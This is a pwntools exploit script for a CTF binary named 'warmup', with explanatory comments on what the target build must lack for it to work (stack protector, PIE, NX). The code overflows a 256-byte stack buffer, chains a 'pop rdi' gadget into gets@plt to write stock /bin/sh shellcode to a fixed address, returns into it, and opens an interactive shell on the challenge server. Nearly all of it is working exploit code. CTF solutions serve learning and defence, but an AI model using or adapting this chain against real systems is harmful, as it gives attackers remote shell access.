# CTF exploit script (pwntools) for the `warmup` challenge binary.
# What the lines below show: an oversized first line overwrites the saved
# return address, the overwritten stack calls gets@plt to read a second input
# into a fixed address, and execution then returns into that address.
# Defender's reading: each hard-coded value below is an assumption about the
# target build. An unbounded gets()-style read, no stack protector, fixed
# (non-PIE) addresses and writable+executable memory all appear to be needed
# together; removing any one of them should break this script as written.
- from pwn import *
# Select x86-64 so asm()/shellcraft/p64 emit 64-bit code and values.
- context.arch = 'amd64'
- p = remote("nothing.chal.ctf.westerns.tokyo",10001)
# Local copy of the binary, used only to resolve the PLT entry for gets.
- elf = ELF('./warmup')
# Hard-coded code address; presumably a `pop rdi; ret` gadget, since it is
# followed in the chain by the argument value and then a call — TODO confirm.
# A fixed address here only holds if the binary is not position-independent.
- rdi = 0x400773
# Hard-coded data address used both as gets()'s destination and as the final
# return target, so the script assumes this memory is writable AND executable
# (NX off) — verify with checksec on the binary.
- buf = 0x0601a00
# Second-stage payload: pwntools' stock /bin/sh shellcode for the arch above.
- shellcode = asm(shellcraft.sh())
# Chain layout: 8 filler bytes (presumably the saved-RBP slot), gadget,
# argument (buf), gets@plt, then buf again as the address to return into.
- rop = p64(0xdeadbeef)+p64(rdi)+p64(buf)+p64(elf.plt["gets"])+p64(buf)
# 256 bytes of padding precede the chain — presumably the size of the
# vulnerable stack buffer. The payload carries no canary value, so it relies
# on the binary having been built without a stack protector.
# NOTE(review): str + bytes concatenation as written assumes Python 2.
- p.sendline("A"*256+rop)
# Pause before the second write; presumably so the two inputs are consumed by
# separate reads on the remote side — confirm.
- sleep(0.5)
# Second input: the shellcode bytes, sent without a trailing newline.
- p.send(shellcode)
# Hand the connection over to the local terminal.
- p.interactive()